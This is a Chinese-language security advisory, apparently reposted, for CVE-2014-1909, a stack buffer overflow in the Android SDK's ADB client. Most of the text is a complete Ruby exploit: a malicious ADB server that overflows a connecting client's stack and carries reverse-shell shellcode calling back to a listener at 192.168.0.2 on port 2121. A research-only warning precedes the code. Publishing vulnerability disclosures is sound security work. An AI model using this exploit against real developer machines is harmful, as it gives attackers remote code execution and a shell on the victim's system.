Android SDK 平台工具签名错误栈缓冲区溢出漏洞

发布日期:2014-02-04
更新日期:2014-02-15

受影响系统:
Android SDK
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 65403
CVE(CAN) ID: CVE-2014-1909

Android SDK Platform Tool是Android设备的开发软件包。

Android SDK Tools的Android Debug Bridge存在栈缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意代码。

<*来源:Joshua J. Drake
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/env ruby
# -*- coding: binary -*-

require 'socket'
require 'uri'

puts "[*] Exploit for ADB client stack buffer overflow -jduck"

# linux/x86/shell_reverse_tcp - 90 bytes
#
# VERBOSE=false, LHOST=192.168.0.2, LPORT=2121,
# ReverseConnectRetries=5, ReverseAllowProxy=false,
# PrependFork=true, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=true, InitialAutoRunScript=, AutoRunScript=
payload =
  "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd" +
  "\x80\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66" +
  "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8" +
  "\x00\x02\x68\x02\x00\x08\x49\x89\xe1\xb0\x66\x50\x51\x53" +
  "\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f" +
  "\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31" +
  "\xdb\x6a\x01\x58\xcd\x80"

def read_request(cli)
  len = cli.recv(4)
  len = len.to_i(16)
  puts "[*] request length: #{len}"

buf = cli.recv(len)
  puts "[*] request: #{buf.inspect}"
  buf
end

srv = TCPServer.new 5037
loop {
  puts "[*] Waiting for client..."
  cli = srv.accept
  puts "[*] Accepted client"
   
  req = read_request(cli)
  if req != "host:version"
    puts "[-] incorrect request!"
    next
  end

res = "OKAY"
  res << "-fff"
  res << ("A" * 112) # padding

# popped registers
  res << [
    0xc0c00004, # ebx
    0xc0c00008, # esi
    0xc0c0000c, # edi
    0xc0c00010, # ebp
    #0x0810efd3, # eip - int 3 / ret
    0x812a14b, # eip - jmp esp
  ].pack('V*')

res << payload

puts "[*] Sending response (0x%x bytes)" % res.length
  cli.write(res)
  cli.close
}
srv.close

建议:
--------------------------------------------------------------------------------
厂商补丁:

Android
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/a79a4d9839bf29e303a6f8e15f24f9f7.html